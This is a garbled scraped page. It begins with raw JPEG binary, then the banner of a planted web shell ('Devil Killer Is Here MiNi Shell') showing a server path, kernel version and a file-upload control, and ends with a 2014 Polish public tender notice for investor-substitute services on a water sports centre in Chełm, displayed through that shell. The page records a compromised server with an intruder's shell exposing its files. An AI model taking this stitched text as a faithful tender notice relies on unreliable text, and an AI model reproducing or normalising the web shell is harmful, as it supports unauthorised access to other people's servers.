JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140520/169268-N-2014.html

<p class="kh_header"><b>Chełm: Pełnienie funkcji inwestora zastępczego przy realizacji budowy Centrum Sportów Wodnych w Chełmie</b><br>
<b>Numer ogłoszenia: 169268 - 2014; data zamieszczenia: 20.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Chełmski Park Wodny i Targowiska Miejskie Sp. z o.o. , ul. Okszowska 41, 22-100 Chełm, woj. lubelskie, tel. 82 565 37 57, faks 82 565 37 57.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inwestora zastępczego przy realizacji budowy Centrum Sportów Wodnych w Chełmie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji inwestora zastępczego przy realizacji budowy Centrum Sportów Wodnych w Chełmie.2. Wykonawca (Inwestor zastępczy) będzie działał w imieniu i na rzecz Zamawiającego oraz odpowiadał za realizację inwestycji zgodnie z przepisami Prawa budowlanego, Prawa zamówień publicznych oraz warunkami określonymi w umowie. W ramach realizacji zamówienia Wykonawca w szczególności:
1) w imieniu Zamawiającego przeprowadzi proces inwestycyjny związany z realizacją budowy Centrum Sportów Wodnych w Chełmie, a w nim:
		a)  etap przygotowawczy,
		b) etap przetargowy,
		c) etap realizacji inwestycji,
	d) etap odbiorów zrealizowanej inwestycji, aż  po uzyskanie zezwolenia na 	eksploatację obiektu w całości i odbiory pogwarancyjne.  
2)  będzie podejmował decyzje we wszelkich sprawach związanych z interpretacją dokumentacji projektowej, tj. projektu budowlanego, projektów wykonawczych oraz  specyfikacji technicznych wykonania i odbioru robót budowlanych. Wszelkie niejasności, wątpliwości interpretacyjne, zwiększenia (zmniejszenia) zakresu  rzeczowego - zwłaszcza generujące zmiany wynagrodzenia i terminu wykonania- będzie uzgadniał   z Zamawiającym i bez jego zgody nie będzie podejmował żadnych decyzji wiążących   w tych sprawach. 
3) będzie  pełnił nadzór inwestorski nad  robotami we wszystkich branżach związanych                       z wykonaniem inwestycji  w zakresie niezbędnym dla ilościowego i jakościowego odbioru robót, a także wykonania obiektu jako całości zgodnie z dokumentacją projektową, sztuką budowlaną i oczekiwaniami Zamawiającego. Nadzór inwestorski powinien być pełniony przez zespół wieloosobowy składający się z koordynatora zespołu inspektorów nadzoru inwestorskiego oraz inspektorów nadzoru  w specjalnościach:  konstrukcyjno - budowlanej; drogowej;  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych; instalacyjnej w zakresie sieci, instalacji                i urządzeń elektrycznych i elektroenergetycznych; telekomunikacyjnej,                                                                                        
4) będzie składał Zamawiającemu miesięczne, pisemne raporty w terminie do 7 dnia po upływie każdego miesiąca kalendarzowego, zawierające informacje o czynnościach wykonywanych, stanie zaawansowania inwestycji, wszelkich przypadkach ujawnionych wad  i opóźnień w realizacji inwestycji. W razie uzasadnionej potrzeby także częściej.
5. Szczegółowy opis zakresu robót , nad którymi ma być sprawowane zastępstwo inwestorskie znajduje się w Dokumentacji budowlanej obejmującej projekt budowlany, projekty wykonawcze, przedmiary robót, specyfikacji technicznej wykonania i odbioru robót budowlanych, stanowiącej załącznik nr 9 do SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego usługi spełniają wymagania określone przez Zamawiającego.
6. Do zakresu zadań  Wykonawcy należy:
    Etap przygotowawczy:
1) przed planowanym terminem rozpoczęcia robót, dokonanie weryfikacji dokumentacji Zamawiającego, w celu sprawdzenia wzajemnej zgodności i kompletności dokumentów oraz weryfikacji ewentualnych błędów w zakresie:
a) zgodności z aktualnie obowiązującymi przepisami, w tym w szczególności  z ustawą z dnia 7 lipca 1994 r. Prawo Budowlane oraz aktami wykonawczymi do niej, ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j.: Dz. U.               z 2013 r., poz. 907 ze zm.) oraz zasadami projektowania i kosztorysowania,
b) kompletności części rysunkowej i opisowej projektu budowlanego i projektów    wykonawczych,
c) kompletności przedmiarów,
d) kompletności i zgodności z przedmiarami, o których mowa w lit. c, pozycji            kosztorysowych oraz zgodności z dokumentacją projektową,
e) zgodności zbiorczego zestawienia kosztów z kosztorysami,
f) poprawności sporządzenia specyfikacji technicznych wykonania                               i odbioru robót uwzględniających wyspecyfikowane w dokumentacji projektowej rodzaje robót,
g) prawidłowości i kompletności dokumentacji projektowej w zakresie warunków technicznych oraz decyzji, wymaganych obowiązującymi przepisami prawa,
2) po dokonaniu weryfikacji dokumentacji technicznej, o której mowa w pkt 1,  do            zgłoszenia Zamawiającemu w terminie maksymalnie do 5 dni roboczych  od dnia           zakończenia weryfikacji, ewentualnych uwag i zastrzeżeń  powziętych w ramach               przeprowadzonej oceny i sporządzenia w formie pisemnej wykazu stwierdzonych błędów i nieprawidłowości w w/w dokumentacji lub złożenia oświadczenia niestwierdzającego wad w  przedmiotowym zakresie;
3) współpracy z projektantem w zakresie czynności mających na celu realizację                 	inwestycji, poprzez ocenę prawidłowości sporządzonej  dokumentacji projektowej  	oraz sprawowania nadzoru autorskiego, w tym także egzekwowania od projektanta 	obowiązków wynikających z pełnienia  nadzoru autorskiego;
4) przekazywania projektantowi zastrzeżeń do dokumentacji projektowej, zgłoszonych przez Generalnego Wykonawcę oraz egzekwowania od   projektanta naniesienia                   stosownych poprawek, również w trakcie realizacji   inwestycji;
5) dokonanie inspekcji terenu budowy oraz przeprowadzenie weryfikacji pod kątem       zgodności stanu istniejącego z dokumentacją projektową;
6) posiadanie lub utworzenie w ciągu miesiąca od podpisania umowy własnego biura 	na terenie Miasta Chełm.

    Etap przetargowy:
1) przygotowanie opisu przedmiotu zamówienia, ustalenie rodzaju i wartości                    zamówienia, zaproponowanie trybu udzielenia zamówienia, oraz przedstawienie             Zamawiającemu, celem zatwierdzenia, dokumentacji  niezbędnej  do wszczęcia               postępowania prowadzącego do wyboru wykonawcy robót budowlanych objętych            inwestycją; w szczególności udziału w przygotowaniu i przeprowadzeniu                   postępowania przetargowego w trybie ustawy z dnia 29 stycznia 2004 r. Prawo                    zamówień publicznych  na wybór Generalnego Wykonawcy inwestycji, w tym                  w szczególności poprzez wsparcie merytoryczne i współpracę z Zamawiającym                 w zakresie określenia opisu przedmiotu zamówienia (kwestie techniczne), bieżącą            pomoc w udzielaniu wyjaśnień na zapytania potencjalnych Wykonawców                   wystosowane w trybie art. 38 ust. 1 ustawy Prawo zamówień publicznych oraz               badaniu i ocenie ofert, a także na ewentualnym etapie skorzystania przez                       Wykonawców ze środków ochrony prawnej (postępowanie odwoławcze przed              Krajową Izbą Odwoławczą oraz postępowanie przed Sądem Okręgowym);
    2)    zaproponowanie osób do Komisji Przetargowej, w liczbie i specjalnościach              wskazanych przez Zamawiającego;     

    Etap realizacji inwestycji:
      1)  przekazanie Wykonawcy robót dokumentacji projektowej;
	2) przygotowanie niezbędnych dokumentów do przekazania placu budowy                               i przekazanie go    Wykonawcy robót przy udziale Zamawiającego;
	3) aktualizacja  harmonogramu   rzeczowo - finansowego   inwestycji w  uzgodnieniu           z  Wykonawcą i przy akceptacji Zamawiającego;
	4) monitorowanie postępu robót  poprzez sprawdzenie ich rzeczywistego           zaawansowania  i zgodności realizacji z obowiązującym harmonogramem robót; 
	5) kontrola techniczna budowy w zakresie stosowania właściwych materiałów                  i urządzeń, wykonania prac zgodnie ze sztuką budowlaną i obowiązującymi        normami we wszystkich branżach występujących na budowie, w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów i urządzeń, zgodnie                    z wymaganiami projektów wykonawczych i specyfikacji technicznych wykonania            i odbioru robót budowlanych; 
      6)  pełnobranżowa koordynacja robót;
	7) organizowanie i przewodniczenie naradom koordynacyjnym na budowie  w terminach uzgodnionych z Zamawiającym i Wykonawcą robót oraz w razie potrzeby z Projektantem;
  8) wydawanie wykonawcy robót poleceń,  potwierdzonych wpisem do dziennika           budowy, dotyczących usunięcia nieprawidłowości lub zagrożeń, wykonania prób          lub badań, także tych wymagających odkrycia robót lub elementów zanikających;
   9) zlecanie Wykonawcy robót wykonania dodatkowych badań materiałów lub robót           budzących wątpliwości co do ich jakości;
  10) żądanie od Wykonawcy robót dokonania poprawek bądź ponownego wykonania   wadliwie wykonanych robót, nadzór nad naprawą wad i usterek;
   11) wstrzymanie robót budowlanych w przypadku, gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z projektem                            i przepisami prawa;
   12) kontrola stanu zaawansowania prac i opiniowanie wysokości płatności częściowych        (końcowej) za roboty wykonane przez Wykonawcę i podwykonawców;
     13) monitorowanie postępu robót w wymiarze finansowym;
     14) egzekwowanie od Wykonawcy uzgodnionego harmonogramu robót;
   15) powiadamianie Zamawiającego o wszelkich roszczeniach  Wykonawcy robót oraz       rozbieżnościach między dokumentacją Zamawiającego, a stanem faktycznym na terenie budowy oraz rozpatrywanie tych roszczeń i przedstawianie stanowiska  w odniesieniu do nich;
 16) przygotowywanie projektów protokołów konieczności wykonywania ewentualnych  robót dodatkowych, zamiennych lub uzupełniających, oraz nadzorowanie tych robót;
  17) dokonywanie obmiaru wykonanych robót; 
 18) bieżące analizowanie zagrożeń dla prawidłowej realizacji roboty wynikłej w trakcie   wykonywania robót, analiza ryzyk w zakresie terminowym, technicznym                          i finansowym oraz ich eliminacja;
 19)przygotowania do odbioru  częściowego, końcowego robót, sprawdzanie kompletności i prawidłowości przedłożonych przez Wykonawcę robót dokumentów wymaganych do odbioru; 
  20) doprowadzenie do odbioru końcowego inwestycji, udział w komisjach odbiorowych;
  21) rozliczenie umowy o roboty budowlane w przypadku jej wypowiedzenia;
 22) w przypadku, gdy wszczęty zostanie spór sądowy między Zamawiającym   a Wykonawcą robót dotyczący realizacji umowy, wsparcie Zamawiającego poprzez przedstawianie wyczerpujących informacji i wyjaśnień dotyczących sporu; 
  23) nadzór nad obsługą geodezyjną budowy prowadzoną przez Wykonawcę;
  24) pełna obsługa administracyjna budowy;
 25) reprezentowanie Zamawiającego na budowie, pełnienie funkcji koordynacyjnych oraz wszystkie inne prace wynikające z przepisów Prawa budowlanego i dobrych praktyk  w branży budowlanej;
 26) nadzór nad wykonaniem przez Wykonawcę pełnej inwentaryzacji powykonawczej obiektu wraz z infrastrukturą uzbrojenia podziemnego nieruchomości oraz zgłoszeniem do Ośrodka Dokumentacji Geodezyjno - Kartograficznej, właściwego dla Miasta Chełm;
 27) nadzór nad wykonaniem przez Wykonawcę, pełno branżowej dokumentacji powykonawczej, w formie papierowej i elektronicznej w ilości egzemplarzy wymaganej prawem.
         
    Etap odbiorów zrealizowanej inwestycji:
 1) przeprowadzenie odbiorów częściowych z kontrolą wykonania wymaganych badań  i prób oraz wyegzekwowanie od Wykonawcy odpowiednich certyfikatów, deklaracji   i oświadczeń;
 2)  zorganizowanie i prowadzenie odbiorów robót zanikających;  
 3) pozyskanie od Wykonawcy robót inwentaryzacji powykonawczej obiektu oraz dokumentacji  powykonawczej; 
 4) przy rozliczeniu końcowym przekazanie Zamawiającemu wszystkich dokumentów 
     potwierdzających wykonanie robót zgodnie z umową, zasadami sztuki budowlanej, normami   i przepisami; 
 5) opracowanie wniosków o uzyskanie zezwolenia na eksploatację obiektu w całości;
 6) W ramach realizacji zamówienia do obowiązków Zamawiającego względem  
      Inwestora Zastępczego, należy:
a) przekazanie kompletu dokumentacji projektowej opisującej inwestycję;
b) dokonywanie płatności wynagrodzenia na zasadach określonych w umowie;
c) zapewnienie konsultacji i współpracy technicznej ze służbami Zamawiającego;
d) opiniowanie i zatwierdzanie bez zbędnej zwłoki dokumentów w sprawach 
       zastrzeżonych dla Zamawiającego związanych z realizacją umowy, dla których  
       taka opinia lub zatwierdzenie będą wymagane;
e) informowanie  o wszystkich decyzjach i sprawach Zamawiającego, mających 
       związek  z pełnioną  funkcją Inwestora Zastępczego. 
f) powołanie komisji odbioru końcowego inwestycji;
g) informowanie Wykonawcy o wszystkich decyzjach i sprawach mających           związek ze świadczonymi przez Wykonawcę usługami;
h) analiza i zatwierdzanie protokołów konieczności na roboty [zamówienia]       uzupełniające (lub/i dodatkowe) oraz roboty zamienne w sytuacji ich  wystąpienia;
i) współpraca z Wykonawcą w przygotowaniu i przeprowadzeniu postępowania o udzielenie zamówienia publicznego, celem wyboru Generalnego Wykonawcy inwestycji;
7) Zamiarem Zamawiającego jest, aby Wykonawca działał w jego imieniu na podstawie stosownych pełnomocnictw, z wyłączeniem uprawnień do podejmowania niżej wymienionych czynności:
a) zawierania umów;
b) zatwierdzania wyboru Generalnego Wykonawcy, dokonanego w trybie 
   ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych ;
c) zatwierdzania wniosków o płatność (faktur) składanych przez Wykonawcę             
    i Generalnego Wykonawcę;
d) zatwierdzania zmiany personelu Wykonawcy i Generalnego Wykonawcy;
e) zatwierdzania wszelkich odstępstw od początkowych założeń projektowych  i robót dodatkowych.  
8) Zamawiający zastrzega sobie prawo do:
a) bezpośredniej i nieograniczonej wizytacji terenu budowy w dowolnym czasie, wglądu do dokumentacji budowy, a także do składania wniosków dotyczących  realizacji inwestycji;
b) udziału w odbiorach robot ulegających zakryciu bądź zanikających, odbiorach częściowych inwestycji oraz w odbiorze końcowym inwestycji;
c) uczestniczenia w przekazaniu zrealizowanej inwestycji do użytkowania;
d) akceptacji lub odrzucenia, w przypadku wystawionych bezpodstawnie lub     nieprawidłowo, wniosków o płatność (faktur) za wykonanie przedmiotu  umowy;
e) odmowy udzielenia Wykonawcy pełnomocnictw i/lub udostępnienia  dokumentów, jeżeli ich udzielenie/udostępnienie nie będzie związane z realizacją przedmiotu umowy. 6. Wykonawca udziela Zamawiającemu gwarancji jakości na usługi objęte przedmiotem umowy. Okres gwarancji wynosi 18 m-cy.W okresie gwarancji przysługuje Zamawiającemu pełne prawo do rękojmi za  wady. Okres gwarancji liczony jest od dnia podpisania protokołu odbioru końcowego, a w przypadku stwierdzenia w trakcie odbioru końcowego wad nadających się do usunięcia - od daty usunięcia tych wad..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.70.00-1, 71.31.00.00-4, 71.54.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 15000,00 PLN (słownie: piętnaście tysięcy PLN  00/100) w terminie i na zasadach określonych w Specyfikacji Istotnych Warunków Zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana  według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Wykonawcy wspólnie ubiegający się o udzielenie zamówienia spełnią ten warunek, jeżeli zostanie on spełniony łącznie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek  dotyczący posiadania wiedzy i doświadczenia, w szczególności w okresie ostatnich trzech lat przed      upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -     w tym okresie, wykonali:
- co najmniej 1 usługę o wartości brutto nie mniejszej niż 470 000,00 zł obejmującą           zarządzanie i nadzór inwestorski nad robotami budowlanymi polegającymi na budowie       lub przebudowie  budynku użyteczności publicznej wraz  z finansowym rozliczeniem 
inwestycji, 
    lub 
- co najmniej 2 usługi każda o wartości brutto nie mniejszej niż 235 000,00 zł każda 
obejmująca  zarządzanie i nadzór inwestorski nad robotami budowlanymipolegającymi na budowie lub przebudowie  budynku użyteczności publicznej wraz z finansowym rozliczeniem inwestycji. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie: a) oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ); 
b) wykazu wykonanych głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenie dowodów, czy zostały wykonane należycie (załącznik nr 4 do SIWZ).
Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączne doświadczenie Wykonawców.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania odpowiednim potencjałem technicznym. Ocena spełniania przez Wykonawców wymienionego warunku udziału w postępowaniu będzie dokonana według formuły spełnia/nie spełnia wymagany warunek na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu (załącznik nr 2 do SIWZ). Zamawiający przy ocenie spełniania tego warunku przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia weźmie pod uwagę łączny potencjał techniczny Wykonawców</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia, w szczególności dysponują:
       a) co najmniej 1 koordynatorem zespołu inspektorów nadzoru inwestorskiego, który posiada niezbędne uprawnienia budowlane w specjalności konstrukcyjno -  budowlanej bez ograniczeń do kierowania robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej  obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. Prawo  budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18  marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora  nadzoru inwestorskiego;
   b) co najmniej 1 inspektorem nadzoru inwestorskiego, który posiada niezbędne              uprawnienia budowlane w specjalności drogowej bez ograniczeń do kierowania              robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które zostały              wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające              uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru              Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy              z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz              ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych              nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63,               poz. 394) oraz posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji             inspektora nadzoru inwestorskiego;
    c) co najmniej 1 inspektorem nadzoru inwestorskiego, który posiada niezbędne              uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń do kierowania robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru Gospodarczego oraz Konfederacji   Szwajcarskiej z zastrzeżeniem  art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca   2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach             członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada              minimum 3 - letnie doświadczenie w pełnieniu funkcji inspektora nadzoru              inwestorskiego;
    d) co najmniej 1 inspektorem nadzoru inwestorskiego, który posiada niezbędne              uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń do kierowania  robotami budowlanymi lub odpowiadające im uprawnienia budowlane, które zostały  wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające uprawnienia wydane osobie będącej obywatelem państw Europejskiego Obszaru  Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem  art. 12a ustawy  z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych  nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63,   poz. 394) oraz posiada minimum 3 - letnie doświadczenie w pełnieniu funkcji 
inspektora nadzoru inwestorskiego;
    e) co najmniej 1 inspektorem nadzoru inwestorskiego, który posiada niezbędne              uprawnienia budowlane w specjalności telekomunikacyjnej bez ograniczeń do              kierowania robotami budowlanymi lub odpowiadające im uprawnienia budowlane,              które zostały wydane na podstawie wcześniej obowiązujących przepisów lub              odpowiadające uprawnienia wydane osobie będącej obywatelem państw              Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej              z zastrzeżeniem  art. 12a ustawy dnia 7 lipca 1994 r. Prawo budowlane (Dz. U.  z 2013 r. poz. 1409 z późn. zm.) oraz ustawy z dnia 18 marca 2008 r. o zasadach  uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63, poz. 394) oraz posiada minimum 3 - letnie  doświadczenie w pełnieniu funkcji inspektora nadzoru inwestorskiego.
Zamawiający dopuszcza łączenie w/w funkcji, w przypadku gdy osoba posiada          jednocześnie kwalifikacje i  uprawnienia do wykonywania każdej z funkcji.
